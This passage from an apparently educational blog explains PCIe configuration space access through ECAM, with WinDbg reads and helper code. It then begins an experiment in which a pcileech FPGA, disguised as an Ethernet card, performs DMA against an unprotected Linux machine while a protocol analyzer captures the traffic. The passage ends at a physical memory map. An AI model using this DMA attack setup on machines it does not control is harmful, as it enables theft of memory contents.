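    return (bus << 20) | (device << 15) | (function << 12) | register


def ecam_address(base: int, bus: int, device: int, function: int,
                 register: int = 0) -> int:
    """Physical address of a config space register for the given BDF."""
    return base + ecam_offset(bus, device, function, register)


if __name__ == "__main__":
    # Vendor ID (register offset 0x00) of the display controller at 02:00.0.
    print(hex(ecam_address(EXAMPLE_ECAM_BASE, 2, 0, 0)))   # 0xc0200000
    # Same register for the second function of that device, 02:00.1.
    print(hex(ecam_address(EXAMPLE_ECAM_BASE, 2, 0, 1)))   # 0xc0201000
```

With 256 buses, 32 devices, and 8 functions at 4 KiB each, a full ECAM region for one segment covers 256 MiB of physical address space.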

If the device is not present, the system will read back all FFs (all 1s in binary). This shows that the device is not currently active on the system.

From this diagram, we can start to see how the enumeration of PCIe actually takes place. When we read back valid config space data, we know a device exists at that BDF. If we read back FFs instead, we know the device is not in that slot or function. Of course, we don’t brute force every address in order to enumerate all devices, as that would be costly due to the overhead of the MMIO. But, a smart version of this brute force is how we can quickly enumerate all devices powered up and responding to us on config space.
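
Here is a minimal sketch of what such a “smart brute force” could look like, run against a small fake config space instead of real hardware. The fake machine, the helper names, and the dictionary layout are all hypothetical. The idea it illustrates is the usual one: probe function 0 of each device, only look at functions 1-7 if the header type has its multi-function bit (0x80) set, and only descend into another bus when a bridge (header type 1) says one exists.

```python
ABSENT = 0xFFFF  # what a Vendor ID read returns when no device answers

# Hypothetical machine, keyed by (bus, device, function). Bus numbers are
# assumed to have been assigned to the bridge already by firmware.
FAKE_CONFIG = {
    (0, 0, 0): {"vendor": 0x8086, "header_type": 0x00},
    (0, 2, 0): {"vendor": 0x8086, "header_type": 0x01, "secondary_bus": 2},
    (2, 0, 0): {"vendor": 0x10DE, "header_type": 0x80},
    (2, 0, 1): {"vendor": 0x10DE, "header_type": 0x80},
}


def read_vendor_id(bus, device, function):
    """Stand-in for a config read of offset 0x00."""
    return FAKE_CONFIG.get((bus, device, function), {}).get("vendor", ABSENT)


def read_header_type(bus, device, function):
    """Stand-in for a config read of offset 0x0e."""
    return FAKE_CONFIG.get((bus, device, function), {}).get("header_type", 0xFF)


def read_secondary_bus(bus, device, function):
    """Stand-in for reading a bridge's secondary bus number."""
    return FAKE_CONFIG[(bus, device, function)]["secondary_bus"]


def scan_bus(bus, found=None):
    """Enumerate every responding function reachable from the given bus."""
    if found is None:
        found = []
    for device in range(32):
        if read_vendor_id(bus, device, 0) == ABSENT:
            continue  # function 0 is missing, so skip the whole device number
        multi_function = read_header_type(bus, device, 0) & 0x80
        for function in range(8 if multi_function else 1):
            if read_vendor_id(bus, device, function) == ABSENT:
                continue
            found.append((bus, device, function))
            if (read_header_type(bus, device, function) & 0x7F) == 0x01:
                # A bridge: whatever is behind it lives on its secondary bus.
                scan_bus(read_secondary_bus(bus, device, function), found)
    return found


if __name__ == "__main__":
    for bus, device, function in scan_bus(0):
        print(f"{bus:02x}:{device:02x}.{function:x}")
```

Compared to probing all 256 x 32 x 8 possible BDFs, this only touches the buses that a bridge actually leads to and the functions a device claims to have.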

Putting it all together - A software config space access

Now that we see how config space is accessed, we can put the two sides together (the hierarchy and the MMIO) to see the full path of an instruction reading config space from kernel mode.

Let’s step through the entire path taken here (from left to right):

Some code running in kernel mode reads an offset from the ECAM virtual mapping.
The virtual mapping is translated by the page tables of the CPU into a physical address into ECAM.
The physical address is read, causing an operation to happen in the internal CPU Interconnect to inform the Root Complex of the access.
The Root Complex generates a packetized version of the request as a TLP that says “Read the value at offset 0x0 for device 02:00.0” and sends it through the hierarchy.
The display controller on Bus 2 receives the TLP and sees that it is a configuration space TLP. It now knows to respond with a configuration space response TLP that contains the value at offset 0x0.

Now let’s look at the response:

The path of the response is much less interesting. The device responds with a special TLP containing the value at offset 0 (which we know is the Vendor ID). That packet makes its way back to the Requester (which was the Root Complex) and the interconnect informs the CPU to update the value of rax to the value of 0x10DE which is the vendor ID of the NVIDIA graphics card. The next instruction then begins to execute on the CPU.

As you can imagine, accesses this way can be quite a lot slower than that of RAM with all of this TLP generation. This is indeed true, and one of the main reasons there are more ways than this MMIO method to talk to a device. In the next post, I will go into more detail about the other method, DMA, and its vital importance in ensuring that software can transfer memory as fast as possible between the CPU and the device.

Exercise: Accessing ECAM manually through WinDbg

So, we took a look at how a config space access theoretically happens, but let’s do the same thing ourselves with a debugger. To do that, we will want to:

Locate where ECAM is on the system.
Calculate the offset into ECAM to read the Vendor ID of the device. For this, I chose the Multimedia Device @ 02:00.1 which is on the NVIDIA graphics card.
Perform a physical memory read at that address to retrieve the value.

The first step is to locate ECAM. This part is a little tricky given that the location of ECAM comes through ACPI, specifically the MCFG table in ACPI. This is the table firmware uses to tell the OS where ECAM is located in the physical memory map of the system. There is a lot to talk about with ACPI and how it is used in combination with PCI, but for now I’ll just quickly skip to the relevant parts to achieve our goal.

In our debugger, we can dump the cached copies of all ACPI tables by using !acpicache. To dump MCFG, click on the link MCFG to dump its contents, or type !acpitable MCFG manually:

8: kd> !acpicache
Dumping cached ACPI tables...
  XSDT @(fffff7b6c0004018) Rev: 0x1 Len: 0x0000bc TableID: SLIC-WKS
  MCFG @(fffff7b6c0005018) Rev: 0x1 Len: 0x00003c TableID: SLIC-WKS
  FACP @(fffff7b6c0007018) Rev: 0x4 Len: 0x0000f4 TableID: SLIC-WKS
  APIC @(fffff7b6c0008018) Rev: 0x2 Len: 0x000afc TableID: SLIC-WKS
  DMAR @(fffff7b6c000a018) Rev: 0x1 Len: 0x0000c0 TableID: SLIC-WKS
  HPET @(fffff7b6c015a018) Rev: 0x1 Len: 0x000038 TableID: SLIC-WKS
  TCPA @(ffffdc89b07209f8) Rev: 0x2 Len: 0x000064 TableID: EDK2    
  SSDT @(ffffdc89b0720a88) Rev: 0x2 Len: 0x0003b3 TableID: Tpm2Tabl
  TPM2 @(ffffdc89b0720e68) Rev: 0x3 Len: 0x000034 TableID: EDK2    
  SSDT @(ffffdc89b07fc018) Rev: 0x1 Len: 0x0013a1 TableID: Plat_Wmi
  UEFI @(ffffdc89b07fd3e8) Rev: 0x1 Len: 0x000042 TableID: 
  BDAT @(ffffdc89b07fd458) Rev: 0x1 Len: 0x000030 TableID: SLIC-WKS
  MSDM @(ffffdc89b07fd4b8) Rev: 0x3 Len: 0x000055 TableID: SLIC-WKS
  SLIC @(ffffdc89b07fd538) Rev: 0x1 Len: 0x000176 TableID: SLIC-WKS
  WSMT @(ffffdc89b07fd6d8) Rev: 0x1 Len: 0x000028 TableID: SLIC-WKS
  WDDT @(ffffdc89b0721a68) Rev: 0x1 Len: 0x000040 TableID: SLIC-WKS
  SSDT @(ffffdc89b2580018) Rev: 0x2 Len: 0x086372 TableID: SSDT  PM
  NITR @(ffffdc89b26063b8) Rev: 0x2 Len: 0x000071 TableID: SLIC-WKS
  ASF! @(ffffdc89b2606548) Rev: 0x20 Len: 0x000074 TableID:  HCG
  BGRT @(ffffdc89b26065e8) Rev: 0x1 Len: 0x000038 TableID: TIANO   
  DSDT @(ffffdc89b0e94018) Rev: 0x2 Len: 0x021c89 TableID: SLIC-WKS
8: kd> !acpitable MCFG
HEADER - fffff7b6c0005018
  Signature:               MCFG
  Length:                  0x0000003c
  Revision:                0x01
  Checksum:                0x3c
  OEMID:                   HPQOEM
  OEMTableID:              SLIC-WKS
  OEMRevision:             0x00000001
  CreatorID:               INTL
  CreatorRev:              0x20091013
BODY - fffff7b6c000503c
fffff7b6`c000503c  00 00 00 00 00 00 00 00-00 00 00 d0 00 00 00 00  ................
fffff7b6`c000504c  00 00 00 ff 00 00 00 00                          ........

To understand how to read this table, unfortunately we need to look at the ACPI specification. Instead of making you do that, I will save you the pain and pull the relevant section here:

As the !acpitable command has already parsed and displayed everything up to Creator Revision in this table, the first 8 bytes of the BODY are going to be the 8 bytes of Reserved memory at offset 36. So, we skip those 8 bytes and find the following structure:

The first 8 bytes of this structure, which immediately follows Reserved, are the base address of the ECAM region. So that means the ECAM base address is at offset 8 of the BODY.

BODY - fffff7b6c000503c
fffff7b6`c000503c  00 00 00 00 00 00 00 00-00 00 00 d0 00 00 00 00  ................
fffff7b6`c000504c  00 00 00 ff 00 00 00 00                          ........

For this system, ECAM is located at address: 0xD0000000. (Don’t forget to read this in little endian order)
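The little endian decode can be double-checked with a few lines of Python. This is a minimal sketch that assumes the BODY bytes printed above and the MCFG allocation layout as I understand it from the specification (8-byte base address, 2-byte segment group, start bus, end bus, then 4 reserved bytes). The variable names are my own.

```python
import struct

# BODY bytes copied from the !acpitable MCFG output above.
body = bytes.fromhex(
    "00 00 00 00 00 00 00 00 "   # 8 reserved bytes
    "00 00 00 d0 00 00 00 00 "   # ECAM base address (little endian)
    "00 00 00 ff 00 00 00 00 "   # segment group, start bus, end bus, reserved
)

# "<" selects little endian: 8 raw bytes, u64, u16, u8, u8, 4 raw bytes.
_, ecam_base, segment, start_bus, end_bus, _ = struct.unpack("<8sQHBB4s", body)

print(hex(ecam_base))                      # base address of ECAM
print(segment, start_bus, hex(end_bus))    # segment group and bus range
```

If the layout assumption holds, the remaining fields say this ECAM region covers segment 0, buses 0x00 through 0xff.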

To verify we got the correct address, let’s read the vendor ID of 00:00.0, which is also the first 2 bytes of ECAM. We will do this using the !dw command, which stands for dump physical word (the exclamation point means physical). This command requires you to specify a caching type, which for our case will always be [uc] for uncached. It also takes a length, which is the number of words to read, specified by L1.

NOTE: It is important that we always match the size of the target device memory to the size we are reading from software. This means, if the value we want to read is a 16-bit value (like Vendor ID), then we must perform a 16-bit read. Performing a 32-bit read might change the result of what the device responds with. For configuration space, we are okay to read larger sizes for Vendor ID, but this is not true in all cases. It’s good to get in the habit of matching the read size to the target size to avoid any unexpected results. Remember: Device memory is not RAM.

Putting that all together, we read the VendorID of 00:00.0 like so:

8: kd> !dw [uc] D0000000 L1
#d0000000 8086

The resulting value we read is 0x8086, which happens to be the vendor ID of Intel. To verify this is correct, let’s dump the same thing using !pci.

8: kd> !pci 100 0 0 0

PCI Configuration Space (Segment:0000 Bus:00 Device:00 Function:00)
Common Header:
    00: VendorID       8086 Intel Corporation

Reading VendorID from a specific Function

Now to calculate the ECAM address for another function we wish to talk to (NVIDIA card at 02:00.1), we will need to perform an “array access” manually by calculating the offset into ECAM using the BDF of the target function and some bit math.

The way to calculate this is present in the PCIe specification, which assigns a certain number of bits of ECAM for bus, device, and function to calculate the offset:

| 27 - 20 | 19 - 15 | 14 - 12     |  11 - 0       |
| Bus Nr  | Dev Nr  | Function Nr | Register      |

By filling in the BDF and shifting and ORing the results based on the bit position of each element, we can calculate an offset to add to ECAM.

I will use python but you can use whatever calculator you’d like:

>>> hex(0xD0000000 + ((2 << 20) | (0 << 15) | (1 << 12)))
'0xd0201000'

This means that the ECAM region for 02:00.1 is located at 0xD0201000.
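If you plan to do this for more than one function, the same bit math can be wrapped into a pair of small helpers. This is just a sketch: the function names are my own, and `ECAM_BASE` is the value read from MCFG on this particular system, so yours will likely differ.

```python
ECAM_BASE = 0xD0000000  # from the MCFG table on this system

def ecam_address(bus, dev, fn, reg=0, base=ECAM_BASE):
    """Physical address of a config space register for a given BDF."""
    assert 0 <= bus < 256 and 0 <= dev < 32 and 0 <= fn < 8 and 0 <= reg < 4096
    return base + ((bus << 20) | (dev << 15) | (fn << 12) | reg)

def ecam_decode(addr, base=ECAM_BASE):
    """Inverse of ecam_address: recover (bus, dev, fn, reg) from an address."""
    off = addr - base
    return (off >> 20) & 0xFF, (off >> 15) & 0x1F, (off >> 12) & 0x7, off & 0xFFF

print(hex(ecam_address(2, 0, 1)))   # 0xd0201000
print(ecam_decode(0xD0201000))      # (2, 0, 1, 0)
```

The decode direction is handy when you are staring at a physical address in a trace and want to know which function it belongs to.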

Now to read the value of the VendorID from the function:

8: kd> !dw [uc] D0201000 L1
#d0201000 10de

The result was 0x10de, which we know from above is NVIDIA Corporation! That means we successfully read the first value from ECAM for this function.

Conclusion

This single post ended up being a lot longer than I expected! Rather than continue this single post, I will instead split this up and flesh out the series over time. There are so many topics I would like to cover about PCIe and only so much free time, but in the next post I will go into more detail about device BARs (a form of device-specific MMIO) and DMA (Direct Memory Access). This series will continue using the same tenets as before, focusing more on understanding rather than specific details.

Hopefully you enjoyed this small look into the world of PCIe! Be back soon with more.

Click here for Part 2!

Reversing Engineering for the Soul
Experiment - Packet Dumping PCIe DMA TLPs with a Protocol Analyzer and Pcileech
26 March 2024 at 00:00

Introduction

In this post, I will be going over a small experiment where we hook up a PCIe device capable of performing arbitrary DMA to a Keysight PCIe 3.0 Protocol Analyzer to intercept and observe the Transaction Layer Packets (TLPs) that travel over the link. The purpose of this experiment is to develop a solid understanding of how memory transfer takes place under PCIe.

This post is part of a series on PCIe for beginners. I encourage you to read the other posts before this one!

Background: On Why PCIe Hardware is so Unapproachable

There are a couple of recurring themes of working with PCIe that make it exceptionally difficult for beginners: access to information and cost. Unlike tons of technologies we use today in computing, PCIe is mostly an “industry only” club. Generally, if you do not or have not worked directly in the industry with it, it is unlikely that you will have access to the information and tools necessary to work with it. This is not intentionally a gatekeeping effort as much as it is that the field serves a niche group of hardware designers and the tools needed to work with it are generally prohibitively expensive for a single individual.

PCIe links operate near the fastest data transfer speeds available in the period in which each standard is put into practice. The most recent standard of PCIe 6.2 has proof of concept hardware that operates at a whopping 64 GigaTransfers/s (GT/s) per lane. Each transfer will transfer one bit, so that means that a full 16 lane link is operating in total at a little over 1 Terabit of information transfer per second. Considering that most of our TCP/IP networks are still operating at 1 Gigabit max and the latest cutting-edge USB4 standard operates at 40 Gigabit max, that is still an order of magnitude faster than the transfer speeds we ever encounter in our day-to-day.

To build electronic test equipment, say an oscilloscope, that is capable of analyzing the electrical connection of a 64GT/s serial link is an exceptional feat in 2024. These devices need to contain the absolute most cutting edge components, DACs, and FPGAs/ASICs being produced on the market to even begin to be able to observe the speed at which the data travels over a copper trace without affecting the signal. Cutting edge dictates a price, and that price easily hits many hundreds of thousands of USD quickly. Unless you’re absolutely flush with cash, you will only ever see one of these in a hardware test lab at a select few companies working with PCIe links.

PCIe 6.0 transmitter compliance test solution

Shown: An incredibly expensive PCIe 6.0 capable oscilloscope. Image © Keysight Technologies

But, all is not lost. Due to a fairly healthy secondhand market for electronics test equipment and recycling, it is still possible for an individual to acquire a PCIe protocol interceptor and analyzer for orders of magnitude less than what they were sold for new. The tricky part is finding all of the different parts of the collective set that are needed. An analyzer device is not useful without a probe to intercept traffic, nor is it useful without the interface used to hook it up to your PC or the license to the software that runs it. All of these pieces unfortunately have to align to recreate a functioning device.

It should be noted that these protocol analyzers are special in that they can see everything happening on the link. They have the capability to analyze each of the three layers of the PCIe link stack: the Physical, Data Link, and Transaction layer. If you’re not specifically designing something focused within the Physical or Data Link layer, these captures are not nearly as important as the Transaction layer. It is impossible for a PC platform to “dump” PCIe traffic like network or USB traffic. The cost of adding such a functionality would well outweigh the benefit.

My New PCIe 3.0 Protocol Analyzer Setup

After a year or so of looking, I was finally lucky enough to find all of the necessary pieces for a PCIe 3.0 Protocol Analyzer on eBay at the same time, so I took the risk and purchased each of these components for myself (for what I believe was a fantastic deal compared to even the used market). I believe I was able to find these devices listed at all because they were approaching about a decade old and, at max, support PCIe 3.0. As newer consumer devices on the market are quickly moving to 4.0 and above, I can guess that this analyzer was probably from a lab that has recently upgraded to a newer spec. This however does not diminish the usefulness of a 3.0 analyzer, as all devices of a higher spec are backwards compatible with older speeds and a huge swath of devices on the market in 2024 are still PCIe 3.0. NVMe SSDs and consumer GFX cards have been moving to 4.0 for the enhanced speed, but they still use the same feature set as 3.0. Most newer features are reserved for the server space.

Finding historical pricing information for these devices and cards is nearly impossible. You pretty much just pay whatever the company listing the device wants to get rid of it for. It’s rare to find any basis for what these are really “worth”.

Here is a listing of my setup, with the exact component identifiers and listings that were necessary to work together. If you were to purchase one of these, I do recommend this setup. Note that cables and cards with similar but not exactly the same identifiers might not be compatible, so be exact!

Agilent/Keysight U4301A PCI Express Protocol Analyzer Module - $1,800 USD (bundled with below)
- This is the actual analyzer module from Agilent that supports PCIe 3.0. This device is similar to a 1U server that must rack into a U4002A Digital Tester Chassis or a M9502A Chassis.
- The module comes installed with its software license on board. You do not need to purchase a separate license for its functionality.
- I used the latest edition of Windows 11 for the software.
- This single module can support up to 8 lanes of upstream and downstream at the same time. Two modules in a chassis would be required for 16 lanes of upstream and downstream.
- https://www.keysight.com/us/en/product/U4301A/pcie-analyzer.html
Agilent/Keysight U4002A Digital Tester Chassis - $1,800 USD (bundled with above)
- This is the chassis that the analyzer module racks into. The chassis has an embedded controller module on it at the bottom which will be the component that hooks up to the PC. This is in charge of controlling the U4301A module and collects and manages its data for sending back to the PC.
One Stop Systems OSS Host PCIe Card 7030-30048-01 A - $8 USD
- The host card that slots into a PCIe slot on the host PC’s motherboard. The cord and card should be plugged in and the module powered on for at least 4 minutes prior to booting the host PC.
Molex 74546-0403 PCIe x4 iPass Cable - $15.88 USD
- The cord that connects the embedded controller module in the chassis to the PC through the OSS Host PCIe card.
Agilent/Keysight U4321 -66408 PCIe Interposer Probe Card With Cables And Adapter - $1,850 USD
- This is the interposer card that sits between the device under test and the slot on the target machine. This card is powered by a 12V DC power brick.
- This is an x8 card, so it can at the max support 8 lanes of PCIe. Devices under test will negotiate down to 8 lanes if needed, so this is not an issue.
- https://www.keysight.com/us/en/product/U4321A/pcie-interposer-probe.html
At least 2x U4321-61601 Solid Slot Interposer Cables are needed to attach to the U4321. 4x are needed for bidirectional x8 connection. These were bundled along with the above.
Total Damage: Roughly $4,000 USD.

Shown: My U4301A Analyzer hooked up to my host machine

FPGA Setup for DMA with Pcileech

It’s totally possible to connect an arbitrary PCIe device, such as a graphics card, and capture its DMA for this experiment. However, I think it’s much nicer to create the experiment by being able to issue arbitrary DMA from a device and observing its communication under the analyzer. That way there’s not a lot of chatter from the regular device’s operation happening on the link that affects the results.

For this experiment, I’m using the fantastic Pcileech project. This project uses a range of possible Xilinx FPGA boards to perform arbitrary DMA operations with a target machine through the card. The card hooks up to a sideband host machine awaiting commands and sends and receives TLPs over a connection (typically USB, sometimes UDP) to the FPGA board that eventually gets sent/received on the actual PCIe link. Basically, this project creates a “tunnel” from PCIe TLP link to the host machine to perform DMA with a target machine.

If you are not aware, FPGA stands for Field-Programmable Gate Array. It is essentially a chip that can have all of its digital logic elements reprogrammed at runtime. This allows a hardware designer to create and change high speed hardware designs on the fly without having to actually create a custom silicon chip, which can easily run in the millions of USD. The development boards for these FPGAs start at about $200 for entry level boards and typically have lots of high and low speed I/O interfaces that the chip could be programmed to communicate to. Many of these FPGA boards support PCIe, so this is a great way to work with high speed protocols that cannot be handled by your standard microcontroller.

Artix-7 FPGA

Image © Advanced Micro Devices, Inc

FPGAs are a very difficult space to break into. For a beginner book on FPGAs, I highly recommend this new book from No Starch (Russell Merrick): Getting Started with FPGAs. However, to use the Pcileech project, you can purchase one of the boards listed under the project compatibility page on GitHub and use it without any FPGA knowledge.

For my project, I am using my Alinx AX7A035 PCIe 2.0 Development Board. This is a surprisingly cheap PCIe-capable FPGA board, and Alinx has proven to me to be a fantastic company to work with as an individual. Their prices are super reasonable for their power, the company provides vast documentation of their boards and schematics, and they also provide example projects for all of the major features of the board. I highly recommend their boards to anyone interested in FPGAs.

While the pcileech project does not have any support for the AX7A035 board, it does have support for the same FPGA as the one used on the AX7A035. I had to manually port the project to this Alinx board myself by porting the HDL. Hopefully this port will provide interested parties with a cheap alternative board to the ones supported by the pcileech project as is.

In the project port, the device is ported to use Gigabit Ethernet to send and receive the TLPs instead of USB3. Over Gigabit Ethernet, pcileech memory dumping runs at about 32MB/s, which is fairly slow compared to the speeds achieved by other pcileech devices over USB 3.0 (130MB/s). However, the board does not have a FT601 USB 3.0 chip to interface with, so the next fastest thing I can easily use on this board is Ethernet.

In this DMA setup, I have the Ethernet cord attached to the system the device is attacking. This means the system can send UDP packets to perform DMA with itself.

Link will be available soon to the ported design on my GitHub.

Shown: DMA setup. Alinx AX7A035 FPGA connected to a U4321 Slot Interposer connected to an AMD Zen 3 M-ITX Motherboard

Experiment - Viewing Configuration Space Packets

For more information about TLPs, please see Part 1 and Part 2 of my PCIe blog post series.

The first part of this experiment will be viewing what a Configuration Read Request (CfgRd) packet looks like under the analyzer. The target machine is a basic Ubuntu 22.04 Server running on a Zen 3 Ryzen 5 platform. This version of the OS does not have IOMMU support for AMD and therefore does not attempt to protect any of its memory. There is nothing special about the target machine other than the FPGA device plugged into it.

The first command we’re going to execute is the lspci command, which is a built-in Linux command used to list PCI devices connected to the system. This command provides a similar functionality to what Device Manager on Windows provides.

Using this command, we can find that the pcileech device is located at BDF 2a:00.0. This is bus 2a, device 00, and function 0.

The next command to execute is sudo lspci -vvv -s 2a:00.0 which will dump all configuration space for the given device.

-vvv means maximum verbosity. We want it to dump all information it can about configuration space.
-s 2a:00.0 means only dump the configuration space of the device with BDF 2a:00.0, which we found above.

Here we see a full printout of all of the details of the individual bits of each of the Capabilities in configuration space. We can also see that this pcileech device is masquerading as an Ethernet device, despite not providing any Ethernet functionality.

Now, let’s prepare the protocol analyzer to capture the CfgRd packets from the wire. This is done by triggering on TLPs sent over the link and filtering out all Data Link and Physical Layer packets that we do not care to view.

Filter out all packets that are not TLPs since we only care about capturing TLPs in this experiment

Now adding a trigger to automatically begin capturing packets as soon as a TLP is sent or received

With this set up, we can run the analyzer and wait for it to trigger on a TLP being sent or received. In this case, we are expecting the target machine to send CfgRd TLPs to the device to read its configuration space. The device is expected to respond with Completions with Data TLPs (CplD TLPs) containing the payload of the response to the configuration space read.

Capture showing CfgRd and CplD packets for successful reads and completions

In the above packet overview, we can see a few interesting properties of the packets listed by the analyzer.

We can see the CfgRd_0 packet is going Downstream (host -> device)
We can see the CplD for the packet is going Upstream (device -> host)
Under Register Number we see the offset of the 4-byte DWORD being read
Under Payload we can see the response data. For offset 0, this is the Vendor ID (2 bytes) and Device ID (2 bytes). 10EE is the vendor ID for Xilinx and 0666 is the device ID of the Ethernet device, as seen above in the lspci output.
We can see it was a Successful Completion.
We can see the Requester ID was 00:00.0 which is the Root Complex.
We can see the Completer ID was 2A:00.0 which is the Device.

Cool! Now let’s look at the individual packet structures of the TLPs themselves:

The TLP structure for the CfgRd for a 4-byte read of offset 0x00

Here we can see the structure of a real TLP generated from the AMD Root Complex and going over the wire to the FPGA DMA device. There are a few more interesting fields now to point out:

Type: 0x4 is the type ID for CfgRd_0.
Sequence Number: The TLP sent over the link has a sequence number associated that starts at 0x00 and increments by 1. The TLP is acknowledged by the receiver after successfully being received using an Ack Data-Link Layer packet (not shown). This ensures every packet is acknowledged as being received.
Length: The Length field of this packet is set to 0x01, which means it wants to read 1 DWORD of configuration space.
Tag: The Tag is set to 0x23. This means that the Completion containing the data being read from config space must respond with the Tag of 0x23 to match up the request and response.
Register Number: We are reading from offset 0x00 of config space.
Requester and Completer: Here we can see that the packet is marked with the sender and receiver BDFs. Remember that config space packets are sent to BDFs directly!
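To see how these fields fit together on the wire, here is a rough Python sketch that packs the three header DWORDs of a CfgRd_0. The bit positions are my reading of the config request header layout, not something taken from the capture, and every field not discussed above is simply left at zero. The First DW Byte Enable value of 0xF (all four bytes) is an assumption. The helper names are made up for this example.

```python
import struct

def bdf_to_id(bus, dev, fn):
    """Pack a BDF into the 16-bit ID format used in TLP headers."""
    return (bus << 8) | (dev << 3) | fn

def build_cfgrd0(requester_id, tag, target_id, register_offset):
    """Pack a 3-DWORD CfgRd_0 header (sketch; unlisted fields are zero)."""
    fmt_type = 0x04          # Fmt=000 (3 DW, no data), Type=00100 (CfgRd_0)
    length_dw = 1            # config reads always ask for 1 DWORD
    first_be = 0xF           # assumption: all 4 bytes of the DWORD enabled
    dw0 = (fmt_type << 24) | length_dw
    dw1 = (requester_id << 16) | (tag << 8) | first_be
    # The DWORD-aligned byte offset lands directly in the register number bits.
    dw2 = (target_id << 16) | (register_offset & 0xFFC)
    return struct.pack(">III", dw0, dw1, dw2)  # headers go out big endian

header = build_cfgrd0(
    requester_id=bdf_to_id(0x00, 0, 0),   # Root Complex
    tag=0x23,
    target_id=bdf_to_id(0x2A, 0, 0),      # the pcileech device
    register_offset=0x00,                 # Vendor ID / Device ID
)
print(header.hex(" ", 4))
```

Notice there is no memory address anywhere in the header: the packet is routed purely by the target BDF in the third DWORD.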

Finally, let’s look at the structure of the Completion with Data (CplD) for the CfgRd request.

This is the response packet immediately sent back by the device responding to the request to read 4 bytes at offset 0.

Here are the interesting fields to point out again:

Type: 0x0A is the type for Completion
The TLP contains Payload Data, so the Data Attr Bit (D) is set to 1.
The Completer and Requester IDs remain the same. The switching hierarchy knows to return Completions back to their requester ID.
The Tag is 0x23, which means this is the completion responding to the above packet.
This packet has a Payload of 1 DWORD, which is 0xEE106606. When read as two little endian 2-byte values, this is 0x10EE and 0x0666.
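If the byte swapping is hard to do in your head, the split can be checked in Python. This sketch only assumes the four payload bytes shown above, in the order they appear in the packet.

```python
import struct

# Payload bytes in wire order, as shown by the analyzer.
payload = bytes.fromhex("EE106606")

# Two little endian 16-bit values: Vendor ID first, then Device ID.
vendor_id, device_id = struct.unpack("<HH", payload)

print(f"{vendor_id:#06x} {device_id:#06x}")   # 0x10ee 0x0666
```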

We can also verify the same bytes of data were returned through a raw hex dump of config space:

Experiment - Performing and Viewing DMA to System RAM

Setup

For the final experiment, let’s do some DMA from our FPGA device to the target system! We will do this by using pcileech to send a request to read an address and length and observing the resulting data from RAM sent from the AMD Zen 3 system back to the device.

The first step is to figure out where the device is going to DMA to. Recall in the Part 2 post that the device is informed by the device driver software where to DMA to and from. In this case, our device does not have a driver installed at all for it. In fact, it is just sitting on the PCI bus after enumeration and doing absolutely nothing until commanded by the pcileech software over the UDP connection.

To figure out where to DMA to, we can dump the full physical memory layout of the system using the following:

gbps@testbench:~/pcileech$ sudo cat /proc/iomem
00001000-0009ffff : System RAM
  00000000-00000000 : PCI Bus 0000:00
  000a0000-000dffff : PCI Bus 0000:00
    000c0000-000cd7ff : Video ROM
  000f0000-000fffff : System ROM
00100000-09afefff : System RAM
0a000000-0a1fffff : System RAM
0a200000-0a20cfff : ACPI Non-volatile Storage
0a20d000-69384fff : System RAM
  49400000-4a402581 : Kernel code
  4a600000-4b09ffff : Kernel rodata
  4b200000-4b64ac3f : Kernel data
  4b9b9000-4cbfffff : Kernel bss
69386000-6a3edfff : System RAM
6a3ef000-84ab5017 : System RAM
84ab5018-84ac2857 : System RAM
84ac2858-85081fff : System RAM
850c3000-85148fff : System RAM
8514a000-88caefff : System RAM
  8a3cf000-8a3d2fff : MSFT0101:00
    8a3cf000-8a3d2fff : MSFT0101:00
  8a3d3000-8a3d6fff : MSFT0101:00
    8a3d3000-8a3d6fff : MSFT0101:00
8a3f0000-8a426fff : ACPI Tables
8a427000-8bedbfff : ACPI Non-volatile Storage
8bedc000-8cffefff : Reserved
8cfff000-8dffffff : System RAM
8e000000-8fffffff : Reserved
90000000-efffffff : PCI Bus 0000:00
  90000000-b3ffffff : PCI Bus 0000:01
    90000000-b3ffffff : PCI Bus 0000:02
      90000000-b3ffffff : PCI Bus 0000:04
        90000000-b3ffffff : PCI Bus 0000:05
          90000000-901fffff : PCI Bus 0000:07
  c0000000-d01fffff : PCI Bus 0000:2b
    c0000000-cfffffff : 0000:2b:00.0
    d0000000-d01fffff : 0000:2b:00.0
  d8000000-ee9fffff : PCI Bus 0000:01
    d8000000-ee9fffff : PCI Bus 0000:02
      d8000000-ee1fffff : PCI Bus 0000:04
        d8000000-ee1fffff : PCI Bus 0000:05
          d8000000-d80fffff : PCI Bus 0000:08
          d8000000-d800ffff : 0000:08:00.0
          d8000000-d800ffff : xhci-hcd
          d8100000-d82fffff : PCI Bus 0000:07
          ee100000-ee1fffff : PCI Bus 0000:06
          ee100000-ee13ffff : 0000:06:00.0
          ee100000-ee13ffff : thunderbolt
          ee140000-ee140fff : 0000:06:00.0
      ee300000-ee4fffff : PCI Bus 0000:27
        ee300000-ee3fffff : 0000:27:00.3
          ee300000-ee3fffff : xhci-hcd
        ee400000-ee4fffff : 0000:27:00.1
          ee400000-ee4fffff : xhci-hcd
      ee500000-ee5fffff : PCI Bus 0000:29
        ee500000-ee5007ff : 0000:29:00.0
          ee500000-ee5007ff : ahci
      ee600000-ee6fffff : PCI Bus 0000:28
        ee600000-ee6007ff : 0000:28:00.0
          ee600000-ee6007ff : ahci
      ee700000-ee7fffff : PCI Bus 0000:26
        ee700000-ee71ffff : 0000:26:00.0
          ee700000-ee71ffff : igb
        ee720000-ee723fff : 0000:26:00.0
          ee720000-ee723fff : igb
      ee800000-ee8fffff : PCI Bus 0000:25
        ee800000-ee803fff : 0000:25:00.0
          ee800000-ee803fff : iwlwifi
      ee900000-ee9fffff : PCI Bus 0000:03
        ee900000-ee903fff : 0000:03:00.0
          ee900000-ee903fff : nvme
  eeb00000-eeefffff : PCI Bus 0000:2b
    eeb00000-eebfffff : 0000:2b:00.4
      eeb00000-eebfffff : xhci-hcd
    eec00000-eecfffff : 0000:2b:00.3
      eec00000-eecfffff : xhci-hcd
    eed00000-eedfffff : 0000:2b:00.2
      eed00000-eedfffff : ccp
    eee00000-eee7ffff : 0000:2b:00.0
    eee80000-eee87fff : 0000:2b:00.6
      eee80000-eee87fff : ICH HD audio
    eee88000-eee8bfff : 0000:2b:00.1
      eee88000-eee8bfff : ICH HD audio
    eee8c000-eee8dfff : 0000:2b:00.2
      eee8c000-eee8dfff : ccp
  eef00000-eeffffff : PCI Bus 0000:2c
    eef00000-eef007ff : 0000:2c:00.1
      eef00000-eef007ff : ahci
    eef01000-eef017ff : 0000:2c:00.0
      eef01000-eef017ff : ahci
  ef000000-ef0fffff : PCI Bus 0000:2a
    ef000000-ef000fff : 0000:2a:00.0
f0000000-f7ffffff : PCI MMCONFIG 0000 [bus 00-7f]
